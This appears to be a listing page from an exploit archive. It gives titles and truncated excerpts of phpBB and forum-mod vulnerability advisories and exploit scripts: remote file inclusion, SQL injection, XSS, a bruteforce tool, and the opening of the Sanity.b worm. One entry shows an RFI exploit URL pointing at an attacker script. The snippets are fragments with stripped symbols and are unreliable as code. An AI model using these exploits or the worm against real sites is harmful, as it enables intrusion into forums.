mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulns

No description provided by source. Title : mail2forum = 1.2 Multiple Remote File Include Vulnerabilities Discovered By OLiBekaS ----------------------------------------------------------------------------- Affected software description : Application : mail for phpbb bulletin board/forum software...

phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages Vuln

No description provided by source. / -------------------------------------------------------------- phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vuln -------------------------------------------------------------- Discovered By StAkeRathotmaildotit Download On...

phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo PhpBB = v2.0.20 \Admin/Restore Database/defaultlang remote commands execution\r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n; echo - you need an admin sid, works regardless of...

THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability

No description provided by source. --------------------------------------------------------------------------- THoRCMS = 1.3.1 phpbbrootpath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team...

phpBB 1.x/2.0.x Multiple Input Validation Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/9942/info It has been reported that phpBB may be prone to multiple vulnerabilities that could allow an attacker to carry out SQL injection and cross-site scripting attacks. These vulnerabilities result from insufficient...

phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip...

Burning Board 1.1.1 URL Parameter Manipulation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/4512/info Burning Board is web forum software. It is written in PHP, back-ended by MySQL, and will run on most Unix and Linux variants as well as Microsoft Windows. An attacker may allegedly create a malicious link which ...

phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability

No description provided by source. ======================X=O=R=O=N===================== + + PHPBB Minerva Mod = 2.0.21 build 238a forum.php Remote SQL Injection Exploit + ======================X=O=R=O=N===================== + + Bulan: xoron + + xoron.biz +...

phpBB SpamOborona Mod <= 1.0b Remote File Include Exploit

No description provided by source. !/usr/bin/perl SpamOborona PHPBB Plugin Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...

phpBB Module XS-Mod 2.3.1 - Local File Inclusion Vulnerability

No description provided by source. ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%. .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%. ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%. .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%...

PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)

No description provided by source...

phpBB Chart Mod 1.1 charts.php id Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly...

phpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool (updated)

No description provided by source. !/usr/bin/perl Title: PhpBB = 2.0.18 Remote Bruteforce/Dictionary Attack Tool Type: Bruteforce / Dictionary attack New demo: http://rapidshare.de/files/13694254/phpbbbtr.avi.html 1.06 mb Php Email Script data: ? mail$destinataire, $objet, $contenu, From:...

FlashBB <= 1.1.8 (sendmsg.php) Remote File Inclusion Vulnerability

No description provided by source. !/usr/bin/perl Flashbb = 1.1.7 - Remote File Inclusion Exploit Url: http://rapidshare.com/files/41426468/FlashBBAaeDueHFcu.zip Exploit: http://site.com/path/phpbb/sendmsg.php?phpbbrootpath=EvilScript: coded and f0und3d by kw3rln officeatrosecuritygroupdotnet...

phpBB Ajax Shoutbox <= 0.0.5 - Remote File Include Vulnerability

No description provided by source. Title: phpBB Ajax Shoutbox = 0.0.5 phpbbrootpath Remote File Inclusion Author/Discovery: boecke Vulnerability Type: Remote File Inclusion Risk: High Risk Software Affected: phpBB Ajax Shoutbox = 0.0.5 Release Source:...

Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)

No description provided by source. /usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ; $a=0; $numero = int rand999; $site = search.aol.com; $procura = viewtopic.php%3Ft%3D$numero; for$n=0;$n90;$n += 10 $sock = IO::Socket::INET-newPeerAddr=$site,PeerPort=80,Proto=tcp or next; print $sock GET...

phpBB Spider Friendly Module <= 1.3.10 File Include Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' | \\ | \\ | \ . . |\ \ \ /\ \ / /| || | | | | \ | \ Y / | || | | \ | \ \ / | || | |/ // / / ||| \ | / / \ / \ |\ /\ / / \ / \ | | | | / /\ \ / \ / \ | | | | / | / Y \ || / /| /| /...

phpBB 2.0.3 search.php Cross Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6311/info phpBB is vulnerable to cross site scripting attacks. This is due to insufficient santization of user-supplied input. The problem is located in the search.php script. This issue may be exploited by an attacker to...

PHPBB 2.0.x Template.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/18255/info The phpBB application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include a...

Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability

No description provided by source. phpBB 2.x Activity MOD Plus File Inclusion Vulnerability Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on phpBB 2.x Activity MOD Plus Original advisory can be found at: http://www.nukedx.com/?viewdoc=38 Succesful...